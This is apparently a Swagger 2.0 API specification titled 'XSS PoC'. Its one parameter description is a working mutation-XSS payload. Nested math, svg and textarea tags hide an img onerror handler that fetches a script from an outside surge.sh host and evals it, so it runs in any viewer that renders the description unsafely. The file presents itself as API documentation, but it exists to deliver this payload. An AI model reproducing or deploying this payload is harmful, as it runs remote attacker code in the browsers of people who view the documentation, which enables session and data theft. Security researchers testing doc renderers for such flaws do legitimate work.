swagger: "2.0"
info:
  title: XSS PoC
  description: API test
  version: "1.0"
host: sinarpagi.com
basePath: /
schemes:
  - https
paths:
  /xss:
    get:
      tags:
        - xss
      summary: Tes endpoint
      parameters:
        - name: foo
          in: query
          required: false
          type: string
          description: |
            <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://exuberant-ice.surge.sh/script.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
      responses:
        '200':
          description: OK
